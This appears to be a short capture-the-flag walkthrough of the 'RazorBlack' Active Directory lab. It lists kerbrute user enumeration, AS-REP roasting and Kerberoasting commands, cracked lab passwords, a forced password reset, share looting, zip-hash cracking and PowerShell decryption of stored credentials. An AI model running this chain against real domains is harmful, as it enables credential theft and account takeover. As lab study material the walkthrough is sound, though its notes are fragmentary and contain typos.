RazorBlack
./kerbrute_linux_386 userenum -d raz0rblack.thm --dc 10.10.241.105 users.txt


showmount -e 10.10.241.105


i open exel file i found users

REP-REPOSTING
impacket-GetNPUsers raz0rblack.thm/ -dc-ip 10.10.194.110 -usersfile users.txt -format john -outputfile crackme.txt -no-pass -request

user cracked

twilliams:roastpotatoes
Targeted Kerberoast
impacket-GetUserSPNs raz0rblack.thm/twilliams:roastpotatoes -dc-ip 10.10.35.193 -request

xyan1d3:cyanide9amine5628

i found a local domain user made secretsdump

xyan1d3.xml
01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e14ed790000000002000000000003660000c000000010000000f098beb903e1a489eed98b779f3c70b80000000004800000a000000010000000e59705c44a560ce4c53e837d111bb39970000000feda9c94c6cd1687ffded5f438c59b080362e7e2fe0d9be8d2ab96ec7895303d167d5b38ce255ac6c01d7ac510ef662e48c53d3c89645053599c00d9e8a15598e8109d23a91a8663f886de1ba405806944f3f7e7df84091af0c73a4effac97ad05a3d6822cdeb06d4f415ba19587574f1400000051021e80fd5264d9730df52d2567cd7285726da2

impacket-smbpasswd sbradley@10.10.108.185

Smbmap to show sharing file
smbmap -H 10.10.108.185 -u 'sbradley' -p '1234@Asd' -r trash --download trash/experiment_gone_wrong.zip

zip2jon file.zip > ziphash
john ziphash --wordlist=/usr/share/wordlists/rockyou.txt

$Credential = Import-Clixml -Path "root.xml"
$Credential.GetNetworkCredential().password
Import-Clixml -Path "xyan1d3.xml"
: This command imports data from an XML file named "xyan1d3.xml"
. The XML file should contain a serialized PSCredential
object. This method is commonly used for securely storing and retrieving credentials.
Convert SecureString to Plain Text (if absolutely necessary, but not recommended due to security concerns):

Last updated